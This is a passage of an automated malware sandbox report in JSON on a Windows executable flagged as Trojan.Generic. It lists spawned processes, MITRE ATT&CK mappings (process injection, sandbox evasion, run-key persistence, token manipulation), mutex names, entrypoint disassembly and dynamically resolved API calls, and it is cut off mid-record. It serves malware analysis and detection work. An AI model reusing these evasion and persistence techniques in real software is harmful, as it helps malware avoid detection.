"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe (PID: 2936)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00002936", "name": "a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe", "normalized_path": "C:\\a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe", "sha256": "a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba", "av_label": "Trojan.Generic", "av_matched": 14, "av_total": 22}, {"uid": "00000000-00005008", "parentuid": "00000000-00002936", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe *", "sha256": "187f64442ea7ecec651c6bb3317a137d01d1a8b7310a1fdbf0f226b5743545aa"}, {"uid": "00000000-00003084", "parentuid": "00000000-00005008", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZUZZRG", "sha256": "187f64442ea7ecec651c6bb3317a137d01d1a8b7310a1fdbf0f226b5743545aa"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002936)\n \"a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002936)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005008)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003084)\n \"085cda53603755dc.exe\" called 